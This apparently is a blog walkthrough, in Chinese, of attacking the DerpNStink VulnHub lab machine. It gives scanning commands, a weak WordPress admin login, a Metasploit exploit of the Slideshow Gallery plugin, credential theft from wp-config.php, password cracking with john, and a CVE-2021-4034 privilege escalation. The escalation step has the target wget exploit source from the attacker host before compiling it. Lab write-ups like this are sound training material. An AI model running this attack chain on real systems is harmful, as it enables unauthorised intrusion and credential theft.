DERPNSTINK: 1-打靶渗透【附代码】(权限提升)

news2024/9/22 9:46:10

DerpNStink

靶机下载地址：

https://www.vulnhub.com/entry/derpnstink-1,221/#downloadhttps://www.vulnhub.com/entry/derpnstink-1,221/#download

1. 主机发现+端口扫描+目录扫描+操作系统等信息收集

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:50:53:00'

1.2. 端口扫描

nmap -p- 192.168.7.10

1.3. 目录扫描

dirb http://192.168.7.10

1.4. 操作系统等信息收集

whatweb 192.168.7.10

2. WEB打点寻找漏洞点

2.1. 进入80端口

1.老规矩，看看网页有啥功能点 -> 无 -> 右键检查页面第一个flag【不好找直接搜flag】

2.网页都是图片，看不了网页源代码，一个解决思路，利用kali直接下载网站源代码看看 -> 顺便看看还有什么可以用的

curl http://192.168.7.10
# flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

在源代码里面发现了一个.txt的路径，疑似信息泄露

/webnotes/info.txt

利用curl工具去访问该路径->翻译看看

curl http://192.168.7.10/\webnotes/info.txt

我们不知道域名先搁置一下，看看扫的目录

2.2. 拼接扫出的目录

1.拼接/robots.txt -> 逐个拼接试试 -> 无用

2.拼接/php/phpmyadmin/，无账号密码信息，弱口令爆破无果->暂时pass

3.拼接/weblog/wp-admin/，无账号密码信息，弱口令爆破 ->【admin:admin】

成功进入

4.拼接/weblog -> 发现跳转到一个域名之下，我们有理由怀疑这就是他的域名

我们在本机将host与ip相关联，具体流程请移步这篇文章查看详细过程

Hacknos-OS-Hax打靶渗透【附POC】-CSDN博客文章浏览阅读403次，点赞4次，收藏6次。Hacknos-OS-Hax打靶渗透【附POC】https://blog.csdn.net/weixin_52487093/article/details/140387153?spm=1001.2014.3001.5502

看文章的2.2到这步就哦了，其中ip改为靶机ip；localhost改为http://derpnstink.local，实在不行就过burp流量尝试一下

wordpress是一个常见的cms，直接用kali的wpscan跑，wpscan蛮好用的如果想具体的深入了解-接口api领取，可以移步我的另一篇文章

《wpscan》免费密钥API申请_wpscan api-CSDN博客文章浏览阅读294次，点赞8次，收藏4次。《wpscan》免费密钥API申请_wpscan apihttps://blog.csdn.net/weixin_52487093/article/details/140379774?spm=1001.2014.3001.5502

5.回到那个wordpress页面

把kali的hosts也改了

cat /etc/hosts
vim /etc/hosts
wpscan --url http://derpnstink.local/weblog

使用Slideshow Gallery 存在的漏洞

因为我们知道后台的账户密码，所以我们用msf来进行getshell操作

2.3. GetShell

1.开启msf环境

msfconsole

search slideshow
use 1
show options
set rhosts 192.168.7.10 #靶机
set targeturi /weblog/	#靶机路径
set wp_user admin
set wp_password admin
run

2.利用python将shell转变为交互式的shell

shell
python -c 'import pty; pty.spawn("/bin/bash")'

3.老规矩，拼接常规默认路径逐个看文件，发现了数据库的账号和密码【root:mysql】

cd /var/www/html/weblog
ls
cat wp-config.php

4.登陆数据库

进入后台 -> 访问 wp_posts 表发现 flag2.txt

5.翻看其他表，wp_users有两个账号密码

unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

6.新建一个文件保存账号密码

vim user_pass.txt
cat user_pass.txt

导出hash库，爆破

cd /usr/share/wordlists
gunzip rockyou.txt.gz
cp rockyou.txt /home/kali/Desktop
cd /home/kali/Desktop
john --wordlist=/home/kali/Desktop/rockyou.txt user_pass.txt

unclestinky:wedgie57
admin:admin

7.在靶机home目录下发现两个用户，mrderp/stinky

8.【以下是拔旗flag，与后续shell无关，专注完成提权目标的可忽略，直接看提权】

尝试切换到stinky用户，密码使用刚刚破解得到的wedgie57

成功切换到stinky用户，进入到stinky目录并查看当前目录的所有文件

su stinky
ls -al
cd ~/Desktop

# 在Desktop目录发现了flag3

3. 权限提升

1.查看版本信息，Ubuntu版本是14.04

尝试找漏洞

searchsploit Ubuntu
searchsploit -m 'linux/local/41762.txt'

2.查看文档，很难利用

找了一个有关版本的相关提权文件，有一个本地提权漏洞CVE-2021-4034，作用有点类似于sudo，允许用户以另一个用户身份执行命令

https://github.com/arthepsy/CVE-2021-4034

将这个文件下载下来，复制到kali里面，并挂到服务上面
在反弹的交互式shell中，必须要进入tmp目录，否则无法下载
从kali的web端wget下来cve-2021-4034-poc.c，将其gcc编译输出。然后复权运行，即可提权成功。

#下载命令
wget http://192.168.7.36:8001/cve-2021-4034-poc.c
 
#下载完成之后，权限修改
chmod +x cve-2021-4034-poc.c
 
#编译脚本
gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt